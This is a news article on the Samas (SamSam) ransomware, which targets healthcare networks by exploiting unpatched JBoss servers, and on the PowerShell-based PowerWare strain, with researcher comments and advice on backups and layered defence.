lolloj - Fotolia

Security researchers warn of server-attacking ransomware

New strain of ransomware said to be distributed by compromising servers and using them to move through networks to encrypt and hold multiple data sets to ransom

As a growing number of US hospitals report ransomware attacks, researchers are warning of a new strain of ransomware targeting the healthcare sector that attacks servers in order to lock up entire networks.

Unlike most other malware that encrypts data and demands ransom for its release, the Samas strain of ransomware does not rely on user-focused attack vectors such as phishing emails.

Instead, Samas – also known as Samsam and MSIL.B/C – is distributed by compromising servers and using them to move laterally through networks to encrypt and hold multiple data sets to ransom.

Samas compromises servers by exploiting known vulnerabilities in unpatched versions of the JBoss application server software identified using the Jexboss open-source network-scanning tool.

Samas then encrypts hundreds of different file types with the Rijndael algorithm and encrypts that key with RSA-2048 bit encryption, according to Nick Biasini, security researcher at Cisco Talos.

“This makes the files unrecoverable unless the author made a mistake in the implementation of the encryption algorithms,” he wrote in a blog post.

Samas is also unusual in that once it is installed, it is self-sufficient and there is no communication with command and control servers, making it harder to detect.

The FBI is asking US businesses and software security experts for emergency help in its investigation of Samas, reports Reuters.

In a confidential advisory obtained by Reuters, the FBI provided a list of technical indicators to help companies determine if they were victims of Samas and to enable network defence activities to reduce the risk of similar attacks in future.

However, like most other forms of ransomware, Samas demands payment in bitcoin and in some cases has offered payment options for multiple files, according to Biasini.

During the Cisco Talos investigation, he said researchers found multiple bitcoin wallets being presented to users containing a total of around 275 bitcoins worth about $115,000.

Read more about ransomware

Biasini believes ransomware will continue to be a threat to the internet until attackers find a more profitable technique.

“Protection against such threats is best achieved using a multi-tier defence architecture to ensure potential threats are scanned multiple times,” he said. “However, one of the most effective ways to protect yourself is by simply backing up valuable files.”

According to Biasini, targeted organisations often find that when backups are most needed, they are either non-existent or incomplete.

“These lapses provide the revenue stream that is currently fuelling the development of ransomware,” he said.

Ransomware is one of the top international cyber threats, along with distributed denial of service (DDoS) attacks and bullet-proof hosting services, according to the UK National Crime Agency.

Research has shown that relatively low-cost ransomware attacks typically net thousands of pounds a week for attackers.

Warnings about Samas ransomware coincide with similar warnings by Carbon Black about ransomware created using Microsoft’s PowerShell scripting language for system administration.

Dubbed “PowerWare”, the ransomware is also being used to target organisations in the healthcare sector, as well as other enterprises.

By using PowerShell to retrieve and execute the malicious code, the ransomware can avoid writing new files to disk and blend in with legitimate activity, making it much harder to detect.

CW+

Features

Enjoy the benefits of CW+ membership, learn more and join.

Read more on Hackers and cybercrime prevention

Join the conversation

1 comment

Send me notifications when other members comment.

By submitting you agree to receive email from TechTarget and its partners. If you reside outside of the United States, you consent to having your personal data transferred to and processed in the United States. Privacy

Please create a username to comment.

This is an unending problem, It breaks, we fix, it breaks again.... Loop. Repeat. Either we build a perpetual motion machine (presumably lined to our bank account) or we finally get down to fixing the problem. Easy? Hell no. Essential? Hell yes.  So what is Big Business waiting for...?
Cancel

-ADS BY GOOGLE

SearchCIO

SearchSecurity

SearchNetworking

SearchDataCenter

SearchDataManagement

Close